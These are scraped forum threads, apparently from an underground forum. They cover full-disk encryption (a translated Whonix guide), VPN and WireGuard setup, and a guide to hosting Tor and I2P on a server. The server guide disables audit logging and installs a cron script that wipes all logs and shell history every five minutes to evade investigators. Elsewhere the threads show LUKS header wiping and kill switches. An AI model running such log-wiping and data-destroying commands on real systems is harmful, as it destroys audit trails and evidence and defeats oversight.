Полное шифрование диска

ID: 676533bbb4103b69df37198f
Thread ID: 34454
Created: 2020-01-19T10:32:38+0000
Last Post: 2024-03-20T23:55:45+0000
Author: wackyph
Prefix: Статья
Replies: 32 Views: 20K

Spoiler: Важно! от себя

Это автоматический перевод https://www.whonix.org/wiki/Full_Disk_Encryption, ностоятельно рекомендую прочитать, хотя бы с помощью того же гугл переводчика все статьи https://www.whonix.org/wiki/Documentation от начала до конца по порядку, инфы там гараздо больше чем в курсах за 30000, что продают на соседних форумах
Так же хочу заметить, что шифрование оказывается бесполезным если вы выбрали слабый пароль(https://www.whonix.org/wiki/Passwords), много людей из за этого село. По оценкам Сноудена, сильные противники могут в секунду перебрать 1 трилион паролей
Заходите на все ссылки через Tor browser

Содержание

Введение
- Шифрование виртуальных машин Whonix
- Меры против ненасильственного принуждения
- Физический доступ
- Защита от сильных противников
хоста Debian
съемных носителя
- Новые сменные носители
- Обновление устаревшего шифрования устройства
зашифрованных контейнера
- Зулукрипт
  - Рекомендуемые настройки безопасности
Дополнительные меры
Советы для твердотельных накопителей и USB-накопителей
Gnome Диски Утилита
сносоки

Введение
Как указано на странице «Предупреждение» , Whonix ™ не был разработан как амнезиальная операционная система. Следы установки и активности пользователя будут записаны на диск. [1]

Шифрование виртуальных машин Whonix
В настоящее время это не поддерживается и не дает никакой дополнительной защиты. Вики-страница « Зашифрованные изображения» содержит подробное объяснение, в котором отмечается следующее:

Множество соображений безопасности предполагают, что для защиты целостности чисто зашифрованного гостевого образа необходим нереалистичный набор операционных правил. Вместо этого рекомендуется использовать полное шифрование диска.

Click to expand...

Меры против ненасильственного принуждения
Даже в относительно цивилизованных государствах законы были неправильно истолкованы, чтобы ослабить защиту гражданских свобод на границе. В случае США четвертая поправка может быть нарушена по желанию сотрудников таможни. В этом разделе рассматривается сценарий, когда кто-либо вынужден разглашать пароли без каких-либо мер, связанных с нанесением физического вреда или лишением свободы на неопределенный срок. В таких ситуациях всегда рекомендуется воспользоваться своим правом хранить молчание и обратиться к адвокату. Ваши устройства, скорее всего, будут конфискованы, и поэтому резервные копии важных данных должны быть сделаны заранее.

Это руководство EFF предоставляет советы и описывает ваши права на границе. Такие советы, как хранение ключевого материала в облаке, следует игнорировать.
Умная техника (стр. 3), предложенная дизайнером OTR Иэном Голдбергом, использует схему секретного разделения Шамира, чтобы разделить файл ключа и распределить его среди доверенных друзей, чтобы сделать создание ключа физической невозможностью.
Криптограф Брюс Шнайер обрисовывает в общих чертах более простой вариант вышеупомянутой техники. Новая случайная строка добавляется в качестве пароля и затем передается доверенному лицу, а обычный пароль удаляется перед пересечением границы. После прибытия ключ для доступа к накопителю может быть восстановлен, а исходный - снова добавлен. [2]

Физический доступ
[ Информация ](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/w/index.php%3Ftitle%3DFile:Ambox_notice.png%26filetimestamp%3D20130717195411%26&xid=17259,15700023,15700186,15700191,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjoeUmJ6azSzp92f3Vb6KCOcw- C-g) Лучше всего предположить, что машина была взломана после любого несанкционированного физического доступа.
Если есть основания подозревать или подтверждать несанкционированный доступ, оборудование нельзя доверять или использовать после того, как оно вернется в ваше распоряжение. Этот сценарий относится только к небольшому меньшинству, которое уже предназначено для физического наблюдения. Достаточно опытный злоумышленник может заразить его шпионским ПО или саботировать его несколькими способами, которые практически невозможно обнаружить. Например, вредоносная прошивка может быть установлена для записи всех действий, или компьютер станет неработоспособным из-за перегрузки оборудования. В этом случае ни одна из мер, описанных в этой главе, не поможет.

Защита от сильных противников
Как отмечалось выше, продвинутые злоумышленники имеют практически безграничные возможности для заражения компьютера под своим физическим контролем, например, путем прошивки низкоуровневой прошивки или добавления физических имплантов.

На хостах Linux может быть возможно получить правдоподобное отрицание, используя методы, отличные от перечисленных ниже, но эта тема - кроличья нора (см. Сноски). [3] Правдоподобное отрицание и полное шифрование диска (FDE) также бесполезны, если они подвергаются физическому насилию со стороны похитителя. Более безопасный вариант - не оставлять никаких следов обнаруживаемых данных на персональном компьютере. Пакет Whonix ™ grub- live обеспечивает амнезическую функцию как на хостах Debian, так и в виртуальной среде Whonix ™. При использовании исключительно внутри виртуальной машины, он может обеспечить адекватную судебную защиту, если будут приняты различные меры предосторожности .

Для защиты от кражи личной информации или данных на хосте следует применять FDE, а компьютер выключать при возникновении ситуаций повышенного риска, таких как путешествия. В случае ноутбуков, батарея должна быть временно удалена после выключения питания. Это гарантирует, что микросхемы ОЗУ полностью отключены и все ключи шифрования в памяти удалены. [4] Гибернация также является безопасной альтернативой, поскольку раздел подкачки шифруется в конфигурации FDE по умолчанию для различных платформ (например, Debian), при условии, что не было внесено никаких изменений.

Обязательно следуйте стандартным советам для выбора сильных и уникальных парольных фраз , чтобы они не могли быть осуществлены грубо. Кроме того, компьютеры никогда не следует оставлять без присмотра в ненадежных местах.

Хосты Debian
Настройка FDE во время установки системы проста. Шифр по умолчанию - AES-256 в режиме XTS.

Съемный носитель
Новые съемные носители
Утилита Gnome Disks создает разделы LUKS с AES-128 по умолчанию, что недостаточно в случае материализации квантовых компьютеров. Это было успешно сообщено и исправлено в апстриме по состоянию на февраль 2019 года, [5] [6], но пока он не появится в Debian, необходимо создать соответствующий безопасный контейнер вручную. После этого разблокируйте устройство и отформатируйте внутреннюю файловую систему как EXT4 на дисках Gnome.

Сначала перечислите устройство. Обычно они называются 'sdb1', так как sdaX зарезервирован для системы при установке по умолчанию. Чтобы избежать путаницы, подключайте одновременно только одно съемное устройство.

# ls /dev/

Создайте контейнер LUKS и при необходимости измените имя устройства, затем следуйте инструкциям.

# cryptsetup -v --cipher aes-xts-plain64 --key-size 512 --use-random luksFormat <device>

Обновление Legacy Device Encryption
Безопаснее повторно зашифровать устройство более сильным ключом, чем выполнять быстрое форматирование, которое в противном случае оставит старый / более слабый заголовок без изменений.

1. Сначала перечислите устройство.
Обычно они называются 'sdb1', так как sdaX зарезервирован для системы при установке по умолчанию. Чтобы избежать путаницы, подключайте одновременно только одно съемное устройство.

# ls /dev/

2. Просмотрите данные заголовка LUKS, чтобы внести необходимые корректировки.
Запустить.

# cryptsetup luksDump --debug <device>

Легенда данных заголовка LUKS:

«МК» означает «Мастер Ключ». [7]
AES в режиме XTS использует размер ключа вдвое больше его размера в битах (в данном случае 512), поскольку в XTS ключ делится на 2, что приводит к AES с 256-битными ключами. [8]
«Смещение полезной нагрузки» составляет 4096 для 256-битных ключей и 2048 для 128-битных ключей. [9]

3. Повторно зашифруйте устройство более сильными ключами. [10]
К счастью, изменение размера заголовка обычно не требуется (иначе это приведет к прерыванию процесса).

# cryptsetup-reencrypt <device> -c aes-xts-plain64 -s 512 --use-directio

Резкое отключение питания может привести к потере данных. Чтобы безопасно приостановить процесс (в случае системного сна / выключения), cryptsetup может быть приостановлен (например, с помощью Ctrl+c ), и он автоматически перезапустится с того места, на котором остановился, если временные файлы заголовков присутствуют в домашнем каталоге. [11]
Зашифрованные контейнеры
Зашифрованные контейнеры имеют двойное преимущество: гибкость и мобильность папок, что позволяет добавлять больше файлов на лету без необходимости повторного сжатия и повторного шифрования (как в случае использования GPG).

Зулукрипт
[ Информация ](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/w/index.php%3Ftitle%3DFile:Ambox_notice.png%26filetimestamp%3D20130717195411%26&xid=17259,15700023,15700186,15700191,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjoeUmJ6azSzp92f3Vb6KCOcw- C-g) Начиная с следующего выпуска в Whonix ™ 15, Zulucrypt включен по умолчанию. В версии командной строки Whonix ™ контейнерами можно управлять с терминала с помощью zulucrypt-cli .
Zulucrypt - это ответ Linux на зашифрованные контейнеры, использующий надежную спецификацию шифрования диска LUKS. Он совместим с зашифрованными файлами гробниц [архив], а также способен читать и создавать контейнеры Truecrypt / VeraCrypt . Обратите внимание, что контейнеры Veracrypt поддерживают максимальную длину пароля не более 64 символов, но максимальное значение LUKS составляет 32 767 (хотя недавно исправленная ошибка ограничивала его только 100 символами). [12] До тех пор, пока можно использовать парные фразы из 20 слов для блокировки контейнеров LUKS, рекомендуется использовать makepasswd для генерации 43 символьных строк. Затем они могут быть вставлены в текстовый файл, который зашифрован с помощью GPG - который не имеет низких ограничений на число символов - по сути, создавая файл временного ключа.

Контейнеры растут динамически по мере добавления данных. Открытые контейнеры монтируются в /run/media/private/user . Для доступа может быть добавлено более одного пароля, используя функцию ключевых слотов LUKS за кулисами. [13]

Рекомендуемые настройки безопасности
Важное примечание: для обеспечения постквантового сопротивления для 256-битного шифрования рекомендуется aes.xts-plain64.512.sha512 параметр aes.xts-plain64.512.sha512 (размер ключа шифрования делится на два в режиме XTS).

Чтобы просмотреть заголовок контейнера, запустите.

sudo cryptsetup luksDump --debug /home/user/<file_name>

С LUKS можно вкладывать контейнеры разных шифровальных шифров; например, поместив контейнер Serpent и Twofish друг в друга, завернутый во внешний AES. Не забудьте выбрать варианты .xts-plain64.512.sha512 во всех случаях. Каждый внутренний уровень должен быть на 1 МБ меньше, чем внешний уровень, чтобы обеспечить место для соответствующего заголовка шифрования каждого контейнера.

Функция вероятного отрицания доступна с типами томов Normal+Hidden Truecrypt/Veracrypt . Тома Veracrypt поддерживают крипто-каскады как функцию, поэтому ручное вложение не требуется. Однако следует помнить, что типы томов Truecrypt / Veracrypt поддерживают только AES-128. Простые контейнеры dm-crypt с ненулевым смещением могут использоваться для предоставления скрытых томов в соответствии с руководством Zulucrypt. Это еще предстоит проверить разработчикам Whonix ™.

Дополнительные меры
Таблица: Дополнительные защитные меры

Мера| Описание
---|---
Удалить заголовок LUKS| Это гораздо более быстрая альтернатива обнулению данных на жестком диске с помощью [Darik Boot and Nuke (DBAN)](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://dban.org/&xid=17259,15700023,15700186,15700191,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhgi_d5vxfxpYMbFcvwqin- HPpy0Ig) [архив] . [14] [15] Это эффективная мера на вращающихся жестких дисках, где уничтоженные данные подтверждаются уничтоженными. ОС нужно только прочитать заголовок LUKS с диска один раз, а не каждую секунду. Очистка заголовка делает невозможным разблокирование диска в будущем. [16]
Замените /dev/sdXY зашифрованным разделом. Ответьте YES на приглашение.
sudo cryptsetup luksErase /dev/sdXY

В качестве альтернативы, чтобы достичь той же цели без запроса, запустите.
sudo dd if=/dev/zero of=/dev/sdXY bs=1M count=2

Это заменит первые два мегабайта раздела /dev/sdXY , который должен охватывать весь заголовок шифрования LUKS для версии 1. Если вы используете LUKS2 с cryptsetup версии 2.1.0 (по умолчанию Debian Buster), размер заголовка по умолчанию теперь составляет 16 МБ , Предыдущие версии cryptsetup использовали заголовок 4MiB LUKS2. В этом случае просто настройте команду dd: dd if = / dev / zero of = / dev / sdXY bs = 1M count = 16 (или count = 4). Определите размер заголовка с помощью команды cryptsetup luksDump --debug .
киллер| Killer [17] - это более новый проект, который поддерживает ряд триггерных действий для отключения системы в случае вмешательства (запрещенных изменений) с USB, Bluetooth, AC, батареей, дисковым лотком и Ethernet. В будущем, помимо выключения, будут поддерживаться пользовательские команды. [18] После того, как программа упакована, она предназначена для предоставления этого программного обеспечения в репозиториях Whonix ™ для хостов Debian.
LUKS Сценарии приостановки| На хостах Linux есть одно интересное решение для рисков, связанных с компьютером в приостановленном состоянии; скрипты luks- suspend. [19] У этого подхода есть некоторые ограничения, потому что он еще не упакован для Debian, и он был протестирован только в дистрибутивах Ubuntu и Arch. Начиная с 2018 года, слияние Luks-Suspend и Keylot (упомянутое ниже) объединяется вверх по течению. [20]
Волшебный ключ| В экстренных случаях Non-Qubes-Whonix ™ может немедленно выключить компьютер с помощью ключевой функции Magic SysRq. Это вызывается нажатием комбинации клавиш: Alt + PrintScreen + o ( PrintScreen буква). В голых металлических системах Linux пароль FDE запрашивается после перезагрузки. [21] [22] [23] Функция магического ключа не работает на хостах Qubes, поскольку гипервизор Xen не распознает эти команды. [24]
Nuke Patch для cryptsetup|

Команда дистрибутива тестирования проникновения Kali написала патч nuke для cryptsetup , который добавляет опцию обнуления всех слотов ключей после ввода определенной парольной фразы; см сноски. [25] [26]
Использование переключателя «мертвец» в качестве «реальной парольной фразы» для перехватчиков машины вряд ли будет эффективной стратегией. Это стандартная процедура судебной экспертизы для предварительного создания нескольких образов диска.

Отдельный / загрузочный раздел| Когда на хосте используется FDE, нежелательно хранить незашифрованные файлы на том же физическом носителе. Те, кто подвержен высокому риску, должны переместить раздел / boot на отдельный USB-носитель, а загрузчик (Grub) также должен быть установлен на отдельный USB-носитель. Чтобы узнать больше об этом, см. [Pwning Past Whole Disk Encryption](https://twopointfouristan.wordpress.com/2011/04/17/pwning-past- whole-disk-encryption/).
TRESOR Kernel Patch| Другой полезной защитой является исправление ядра TRESOR, которое хранит ключ шифрования диска вне ОЗУ, храня его внутри ЦП. TRESOR имеет несколько ограничений. Он доступен только для архитектуры x86 и усложняет отладку программного обеспечения, отключая регистры DR по соображениям безопасности. [27] Кроме того, специализированный злоумышленник, который может реконструировать аппаратные разработки, также способен извлекать секреты, хранящиеся в кэш- памяти процессора или специализированных чипах, таких как TPM.
USBKill|

USBKill - это анти-криминалистический скрипт, написанный после окончания процесса SilkRoad. Его целью является запуск защитных событий, которые не позволяют злоумышленникам откачивать файлы, устанавливать вредоносные программы или запускать джигглер мыши. Скрипт создает белый список допустимых USB-устройств. Если к машине подключено что-либо еще, ОЗУ стирается, и компьютер немедленно выключается.
USBKill также можно настроить, чтобы исключить подключение всех устройств. В другой конфигурации с высоким уровнем безопасности флэш-диск из белого списка служит ключом и должен постоянно находиться в USB-порту. Если флэш-накопитель был принудительно удален, программа запустит нужные процедуры. [28] [29]

Рекомендации для твердотельных накопителей и USB-накопителей
В случае хранилищ на основе флэш-памяти, таких как твердотельные накопители (SSD) и USB, единственный способ защитить данные - это никогда не сохранять их в незашифрованном виде!
В отличие от жестких дисков (HDD), перезапись данных на SSD больше не эффективна при очистке диска. [30] [31] Например, небезопасно полагаться на механизм быстрого стирания, перезаписывая область заголовка и слота ключа. [32]

Самым страшным потенциальным последствием является то, что старые пароли не стираются, а в течение значительного периода. Рассмотрим следующий конкретный пример: кто-то меняет пароль своего компьютера, потому что он заметил, что он подвергался серфингу или CCTV. На SSD старый пароль все еще доступен для восстановления и может использоваться для расшифровки главного ключа и всех данных. Причина в том, что безопасная перезапись гарантируется только на магнитных дисках.

Механизмы выравнивания износа, такие как TRIM, также пропускают информацию о файловой системе, которая может помочь криминалистам. [33] [34] [35] [36] [37] Настоятельно рекомендуется оставить TRIM отключенным (по умолчанию) во время установки с LUKS-шифрованием в Linux.

Утилита Gnome Disks
Утилита Gnome Disks предоставляет удобный способ манипулировать парольными фразами контейнеров LUKS (включая хост) и вышележащими файловыми системами. Однако на него не следует полагаться при шифровании, поскольку он использует AES-128 в качестве жестко заданного значения по умолчанию [38] [39] (по состоянию на Debian Stretch), что не обеспечивает адекватной постквантовой безопасности . Для шифрования съемных носителей обратитесь к этому руководству .

Чтобы установить его, запустите.

sudo apt-get install gnome-disk-utility

**Сноски(Заходите на все ссылки через Tor browser, они ведут на гугл переводчик) **

Хотя DBAN можно использовать бесплатно, нет гарантии, что ваши данные будут полностью очищены на всем диске. Он не может обнаружить или стереть твердотельные накопители и не предоставляет сертификат удаления данных для целей аудита или соответствия нормативным требованиям. Поддержка оборудования (например, без разборки RAID), поддержка клиентов и обновления программного обеспечения недоступны с использованием DBAN.

Click to expand...

https://superuser.com/questions/1168928/wipe-luks-partition-in-pre-boot/1177362 [архив]
https://github.com/Lvl4Sword/Killer [архив]
https://github.com/Lvl4Sword/Killer/issues/48 [архив]
https://github.com/vianney/arch-luks-suspend/issues/7 [архив]
https://blog.freesources.org/posts/2018/06/debian_cryptsetup_sprint_report/ [архив]
https://en.wikipedia.org/wiki/Magic_SysRq_key [архив]
https://www.thegeekstuff.com/2008/12/safe-reboot-of-linux-using-magic-sysrq-key/ [архив]
https://phabricator.whonix.org/T553 [архив]
https://forums.whonix.org/t/fde-emergency-feature-testing-requested [архив]
https://github.com/offensive-security/cryptsetup-nuke-keys [архив]
В большинстве чрезвычайных ситуаций не хватит времени, чтобы перезагрузить компьютер и ввести кодовую фразу выключателя.
https://security.stackexchange.com/a/119835 [архив]
Например, это можно сделать быстро, если флешка прикреплена к вашему запястью через ремешок.
https://github.com/hephaest0s/usbkill [архив] https://en.wikipedia.org/wiki/USBKill [архив] https://7io.net/2015/07/02/python-usbkill-anti-forensic-usb-killswitch/#more-201 [архив] https://phabricator.whonix.org/T552 [архив]
http://www.infosecisland.com/blogview/12153-Data-Remains-on-USB-and-SSDs-After-Secure-Erase.html [архив]
https://www.theregister.co.uk/2011/02/21/flash_drive_erasing_peril/ [архив]
FAQ cryptsetup FAQ - Раздел: 5.19 Как насчет SSD, Flash и гибридных накопителей? [архив]
https://asalor.blogspot.com/2011/08/trim-dm-crypt-problems.html [архив]
https://wiki.archlinux.org/index.php/Dm-crypt/Specialties#Discard.2FTRIM_support_for_solid_state_drives_.28SSD.29 [архив]
https://wiki.archlinux.org/index.php/Solid_State_Drives#dm-crypt [архив]
https://www.saout.de/pipermail/dm-crypt/2011-September/002019.html [архив]
https://www.saout.de/pipermail/dm-crypt/2012-April/002420.html [архив]
Как протестировано разработчиком Whonix ™ HulaHoop.
Отчет об ошибках Debian: По умолчанию улучшено шифрование до AES-256 [архив] Отчет об ошибке утилиты Gnome Диски: Расширение шифрования до AES-256 по умолчанию [архив]

VPN, TOR настройка, мануалы (все темы)

ID: 676533bbb4103b69df3718d6
Thread ID: 80240
Created: 2023-01-18T16:47:13+0000
Last Post: 2024-12-18T14:48:49+0000
Author: r_as
Replies: 194 Views: 20K

Общая тема - VPN→TOR→VPN, настройка, безопасность, итд.
Общая тема - Анонимность, безопасность TOR (общая тема)
Тема - Tor: от азов до продвинутого уровня
Мануал - Прокидываем весь трафик через TOR без утечек!
Мануал - VPN-TOR-VPN/double VPN за 5 минут
Статья - Прокидываем трафик мессенджеров через TOR
Статья - [Вдруг не знал!] Как без лишних заморочек развернуть OpenVPN на SSH
Тема - Анонимность, безопасность VPN (общие вопросы).
Мануал - Правильное использование VPN в Linux
Статья - Параллельное использование впн
обсуждение - ExpressVPN
обсуждение - ProtonVPN
Статья - Настройка VPN с Wireguard с нуля шаг за шагом | + English Version
Мануал - Medusa: многопотоковый Tor-прокси
Статья - VPN развод от outline.network или кому выгодно чтобы пользовались данным сервисом
Статья - Настройка OpenVPN без логов / логирования
обсуждение - Mullvad, обсуждение
обсуждение - Whonix, блокировка трафика?
Мануал - Повторное анонсирование hidden service после отвала коннекта - /threads/103020/
Мануал - Git\Ssh and others over TOR. - /threads/106358/
обсуждение - Утечка IP, как проверить VPN - /threads/119958/
обсуждение - Did German Police Break Tor? - /threads/124817/

VPN→TOR→VPN, настройка, безопасность, итд.

ID: 676533bbb4103b69df371910
Thread ID: 74248
Created: 2022-10-12T07:21:52+0000
Last Post: 2024-11-07T14:26:53+0000
Author: asddddd
Replies: 183 Views: 20K

Не работает выходной vpn на связке - vpn (хост машина) - whonix gateway - рабочая машина (linux mint) - выходной vpn (wireguard).
Настроил все по гайдам, но при запуске впн не работает, может я что-то делаю не так? Весь трафик завернут в тор через whonix gateway
Мои действия:

на сервере я прописываю sudo apt update и sudo apt full-upgrade
устанавливаю wireguard sudo apt install wireguard
генерирую ключи для сервера wg genkey | tee privatekey | wg pubkey > publickey
настраиваю конфиг sudo nano /etc/wireguard/wg0.conf

Code:Copy to clipboard

[Interface]

  Address = 192.168.40.1

  SaveConfig = false

  PrivateKey = <приватный ключ сервера>

  PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE; ip6tables -A FORWARD -i %i -j ACCEPT; ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

  PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE; ip6tables -D FORWARD -i %i -j ACCEPT; ip6tables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

  ListenPort = 51820

[Peer]
  PublicKey = <публичный ключ клиента>
  AllowedIPs = 192.168.40.2

поднимаю сервер sudo wg-quick up wg0
проверяю sudo wg**

Code:Copy to clipboard

interface: wg0
 public key: (публичный ключ сервера)
 private key: (hidden)
 listen port: 51820
 
 peer: (публичный ключ клиента)
 allowed ips: 51820

настройка конфига клиента**

Code:Copy to clipboard

[Interface]

 PrivateKey = <приватный ключ клиента>

 Address = 192.168.40.5


[Peer]

 PublicKey = <публичный ключ сервера>

 AllowedIPs = 0.0.0.0/0

 Endpoint = <ipv4 сервера>:51820

 PersistentKeepalive=25

запускаю впн sudo wg-quick up wg0

Code:Copy to clipboard

peer: < публичный ключ сервера >

endpoint: <ipv4 сервера>:51820
allowed ips: 0.0.0.0/0
transfer: 0 B received, 296 B sent
persistent keepalive: every 25 seconds

Безопасный портал в тёмные интернеты (Tor + I2P)

ID: 676533bbb4103b69df371ac3
Thread ID: 24929
Created: 2014-01-15T16:17:22+0000
Last Post: 2022-09-02T01:59:54+0000
Author: 12309
Prefix: Статья
Replies: 21 Views: 19K

В этой статье я опишу установку Tor и I2P роутеров на выделенный сервер и безопасную настройку своего компьютера для использования этих сетей.
Для чего это нужно? - Чтобы не спалить свой компьютер всевозможным снифферам и чтобы не оставлять на компьютере палева в виде установленных Tor/I2P роутеров. Вдобавок, подняв роутеры на сервере с широким каналом, вы окажете бОльшую помощь работе сетей, чем подняв роутеры на домашнем компьютере с узким каналом. Некоторые настройки отсюда (например, логи) пригодятся для любых серверов.

Инструкция актуальна для Centos 6 x64_64 Minimal. Большинство конфигов одинаковы для всех дистров, если юзаете какой-нибудь дебиан, поправите этот мануал сами. Рекомендую использовать выделенный сервер, а не VDS, т.к. слабый VDS может не вытянуть нагрузки и с VDS жуликам/органам намного легче слить данные, чем с полноценного сервера. При заказе сервера не забывайте пользоваться VPN или Socks, и оплачивайте анонимными валютами типа чеков Paymer или Bitcoin/Litecoin/*coin

Условные обозначения:
222.222.222.222 - IP вашего сервера, где всё это будет устанавливаться
13.13.13.13 - IP вашего VPN, которому будет разрешён доступ (VPN лучше поднять на сервере, расположенном в другом датацентре! Таким образом вероятность фейла в случае изъятия какого-либо сервера будет меньше. Не рекомендую пользоваться публичными VPN сервисами, т.к. нет никаких гарантий, что они не сливают логи "куда следует". Инструкций по поднятию VPN в интернете навалом, юзайте поиск)
4.2.2.2, 8.8.8.8, 141.1.1.1 - публичные DNS-сервера, вместо этих можно юзать любые другие.

Для начала устанавливаем репозиторий epel и полезный софт:

Code:Copy to clipboard

rpm -i http://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm
yum install curl perl xinetd java-1.6.0-openjdk make automake autoconf gcc gcc-c++ time bind-utils sed vim-enhanced bash-completion screen mc zip unzip bzip2 elinks lsof openssh-clients file pwgen iftop iotop jwhois sudo glibc-static.i686 glibc-static.x86_64 glibc-devel.i686 glibc-devel.x86_64 sysstat daemonize ntpdate

Делаем меньше логов:

Code:Copy to clipboard

perl -i -pe 's/rotate [0-9]/rotate 0/' /etc/logrotate.conf;
perl -i -pe 's/weekly/daily/' /etc/logrotate.conf;                                       
perl -i -pe 's/monthly/daily/' /etc/logrotate.conf;                                      
perl -i -pe 's/^#?MAILTO=root/MAILTO=\/dev\/null/' /etc/crontab                          
perl -i -pe 's/\/var\/log\/messages/\/dev\/null/' /etc/rsyslog.conf                      
perl -i -pe 's/\/var\/log\/secure/\/dev\/null/' /etc/rsyslog.conf

Останавливаем всякое говно (на случай, если это был не Minimal дистрибутив):

Code:Copy to clipboard

service auditd stop 
chkconfig auditd off 
service rsyslog stop
chkconfig rsyslog off
service httpd stop
chkconfig httpd off
service exim stop
chkconfig exim off
service sendmail stop
chkconfig sendmail off
service mysql stop
chkconfig mysql off
service atd stop 
chkconfig atd off 
service nfslock stop 
chkconfig nfslock off 
service rpcidmapd stop 
chkconfig rpcidmapd off 
service bluetooth stop 
chkconfig bluetooth off 
service gpm stop 
chkconfig gpm off 
service hidd stop 
chkconfig hidd off 
service pcscd stop 
chkconfig pcscd off 
service portmap stop 
chkconfig portmap off 
service avahi-daemon stop 
chkconfig avahi-daemon off 
service pcscd stop 
chkconfig pcscd off 
service cups stop 
chkconfig cups off

И запускаем логчистилку по крону:

Code:Copy to clipboard

if grep -q '/root/lol.sh' /etc/crontab 2>/dev/null && test -s '/root/lol.sh';
then
 echo "+ logcleaner installed already";
else
 echo '#!/bin/bash
 : > /var/run/utmp 2>/dev/null;
 : > /root/.bash_history 2>/dev/null;
 for i in `find /var/log/ -type f`; do : > $i; done' > /root/lol.sh;
 echo '*/5 * * * * root sh /root/lol.sh >/dev/null 2>/dev/null' >> /etc/crontab;
 echo >> /etc/crontab;
 echo "+ logcleaner saved";
fi

Для правильной работы сервисов рекомендую синхронизировать время на сервере

Code:Copy to clipboard

ntpdate pool.ntp.org

Теперь ставим свой DNS сервер, будем использовать его на своём компе, чтобы
а) не палить свои запросы провайдеру или гуглу (читаем Н.Федотов "Форензика - Компьютерная криминалистика",

К примеру, оценивая следы при просмотре пользователем веб сайта, неспециалист (скажем, следователь) может заключить, что следы (доказательства) следует искать в двух местах – на персональном компьютере пользователя и на сервере, на котором расположен веб сайт. И это будет ошибкой. Не обладая знаниями, глубже определенного, положенного для пользователя уровня, следователь упускает из виду обращение к DNS резолверу пользователя, а также рекурсивные обращения этого резолвера к нескольким DNS серверам. Такие обращения могут логироваться и служить полноценными (то есть не косвенными, не дополнительными, а вполне самостоятельными) доказательствами посещения определенной веб страницы.

Click to expand...

б) если отвалится VPN, узнать об этом, т.к. (новые) сайты перестанут открываться. Старые теоретически могут работать, т.к. их адреса будут в локальном кэше DNS.

Code:Copy to clipboard

yum install bind-chroot
if grep -q 4.2.2.2 /etc/resolv.conf;
then
 echo "+ resolv.conf already added";
else
 cp /etc/resolv.conf -f /etc/resolv.conf_backup 2>/dev/null;
 echo "nameserver 4.2.2.2" > /etc/resolv.conf;
 echo "nameserver 8.8.8.8" >> /etc/resolv.conf;
 echo "nameserver 141.1.1.1" >> /etc/resolv.conf;
 echo "++ added dns to resolv.conf";
fi

Редактируем любимым редактором /etc/named.conf, отключая логирование и разрешая dns запросы только с определённых IP. Не забудьте изменить параметр version и IP из условных обозначений.

Code:Copy to clipboard

options {
        listen-on port 53 { 222.222.222.222; }; 
        directory       "/var/named";
        dump-file       "/var/named/data/cache_dump.db";
        statistics-file "/var/named/data/named_stats.txt";
        memstatistics-file "/var/named/data/named_mem_stats.txt";
        allow-query     { localhost; 13.13.13.13; };
        recursion yes;
        allow-transfer { none; };
        forward first;
        forwarders { 4.2.2.2; 141.1.1.1; 8.8.8.8; };
        version "CoolDNS v. 1.3.3.7";
        bindkeys-file "/etc/named.iscdlv.key";
        managed-keys-directory "/var/named/dynamic";
        check-names master warn;
        check-names slave warn;
        check-names response warn;
};
logging {
        category default { null; };
        category config { null; };
        category update { null; };
        category edns-disabled { null; };
        category lame-servers { null; };
        category general { null; };
        category database { null; };
        category network { null; };
        category notify { null; };
        category resolver { null; };
        category xfer-in { null; };
        category queries { null; };
};
zone "." IN {
        type hint;
        file "named.ca";
};
include "/etc/named.rfc1912.zones";
include "/etc/named.root.key";

И включаем dns сервер

Code:Copy to clipboard

service named restart
chkconfig named on

Теперь ставим TOR:

Code:Copy to clipboard

yum install tor

Любимым текстовым редактором правим /etc/tor/tor-tsocks.conf

Code:Copy to clipboard

local = 127.0.0.0/255.128.0.0
local = 127.128.0.0/255.192.0.0
local = 169.254.0.0/255.255.0.0
local = 172.16.0.0/255.240.0.0
local = 192.168.0.0/255.255.0.0
server = 127.0.0.1
server_type = 5
server_port = 443

и /etc/tor/torrc

Code:Copy to clipboard

SocksPort 443
Log err file /dev/null
RunAsDaemon 1
DataDirectory /var/lib/tor
ORPort 8080
ExitPolicy reject *:*
BridgeRelay 1
PublishServerDescriptor 0

За описанием опций - в ман или гугл (или прочитайте комментарии в исходных конфигах). Вкратце: поднимаем тор в режиме bridge и запрещаем выход в белый интернет через наш сервер (т.е. он не будет exit нодой), чтобы с него всякие жулики не творили злых дел. Сокс-прокси тора поднимаем на порту 443, потому что этот порт реже всего блокируется провайдерами.

Запускаем Tor и ставим в автозагрузку:

Code:Copy to clipboard

service tor restart
chkconfig tor on

Готово, приступаем к I2P. Запускать I2P от рута не рекомендуется, для этого лучше создать отдельного пользователя и делать всё от его имени (для Tor мы этого не делали т.к. в редхате он по умолчанию запускается от отдельного пользователя toranon):

Code:Copy to clipboard

useradd asdf
su asdf

Ставим I2P:

Code:Copy to clipboard

mkdir ~/i2p
cd ~/i2p
wget http://mirror.i2p2.de/i2pinstall_0.9.9.jar
java -jar i2pinstall_0.9.9.jar -console

В установщике тыкаем 1, Enter, 1

Правим любимым редактором конфиг /home/asdf/i2p/clients.config :

Code:Copy to clipboard

clientApp.0.main=net.i2p.router.web.RouterConsoleRunner
clientApp.0.name=I2P Router Console
clientApp.0.args=7657 127.0.0.1 ./webapps/
clientApp.0.delay=0
clientApp.0.startOnLoad=true
clientApp.1.main=net.i2p.sam.SAMBridge
clientApp.1.name=SAM application bridge
clientApp.1.args=sam.keys 127.0.0.1 7656 i2cp.tcp.host=127.0.0.1 i2cp.tcp.port=7654
clientApp.1.delay=120
clientApp.1.startOnLoad=false
clientApp.2.main=net.i2p.i2ptunnel.TunnelControllerGroup
clientApp.2.name=Application tunnels
clientApp.2.args=i2ptunnel.config
